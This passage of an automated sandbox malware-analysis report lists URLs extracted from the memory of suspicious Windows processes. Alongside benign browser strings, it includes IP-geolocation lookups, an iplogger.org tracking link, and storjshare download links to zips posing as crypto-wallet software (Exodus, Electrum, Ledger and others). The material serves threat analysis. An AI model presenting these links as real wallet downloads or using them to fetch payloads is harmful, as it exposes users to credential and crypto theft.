                      Source: F0A3.tmp.ctx.exe, 00000027.00000002.2446819556.0000024337180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                      Source: F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                      Source: F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                      Source: F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                      Source: firefox.exe, 0000002C.00000002.2586946099.000001449CF11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881jar:file
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                      Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                      Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/$
                      Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fZ
                      Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/O
                      Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json&
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json1
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonFw
                      Source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonZ
                      Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonhE
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonn
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonp
                      Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D6457A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsons
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
                      Source: be08f59021.exe, 00000016.00000003.3054113358.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.3054373991.000000000565C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1Pz8p7
                      Source: t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
                      Source: dwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
                      Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64546000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
                      Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD0000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2773D6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64546000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
                      Source: dwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
                      Source: firefox.exe, 0000002C.00000002.2836484023.000012B890804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2709016871.00000144AF89F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: firefox.exe, 0000002C.00000002.2709016871.00000144AF89F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                      Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://pdf.js/PdfJsDefaultPreferences.sys.mjsM
                      Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sresource://gre/modules/FileUtils.sys.mjs
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.comhttps://support.mozilla.orgtestPermissionFromPrincipalremoveTabsProgressL
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                      Source: explorer.exe, 00000014.00000003.3074284180.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comNaP0B
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                      Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
                      Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
                      Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js9548D9F
                      Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                      Source: explorer.exe, 00000014.00000000.2221917416.000000000D0D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcemberZ
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                      Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
                      Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
                      Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js99FCFE5DV
                      Source: AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsU
                      Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js~
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/google
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.comchrome://browser/skin/menu.svgFailed
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svgresource://gre/modules/FileUtils.sys.mjsFileUtils_closeAt
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                      Source: firefox.exe, 0000002C.00000002.2682991190.00000144AED30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2681975606.00000144AEC10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpthe
                      Source: firefox.exe, 0000002C.00000002.2767048406.00000144B02A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
                      Source: firefox.exe, 0000002C.00000002.2770184103.00000144B0378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.org
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/ContentPrefServiceChild.sys
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000014.00000003.3074284180.000000000D47A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com//C
                      Source: explorer.exe, 00000014.00000000.2218023327.0000000009734000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                      Source: explorer.exe, 00000014.00000003.3074284180.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com576
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.c)
                      Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: dwVrTdy.exe, 0000000A.00000003.2051032526.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051058221.000001CDE2B15000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051187960.000001CDE2B20000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051091219.000001CDE2B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/2$(
                      Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/=
                      Source: AzVRM7c.exe, 0000000B.00000003.2097250359.000002E277431000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E277438000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097967560.000002E277446000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097821581.000002E277435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/cjhd
                      Source: t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162982228.0000026D645BE000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/cjhdj
                      Source: firefox.exe, 0000002C.00000002.2811181588.00000144B4D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                      Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/earch
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/l3
                      Source: t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162805710.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/m
                      Source: dwVrTdy.exe, 0000000A.00000003.2051453805.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051426857.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/om/
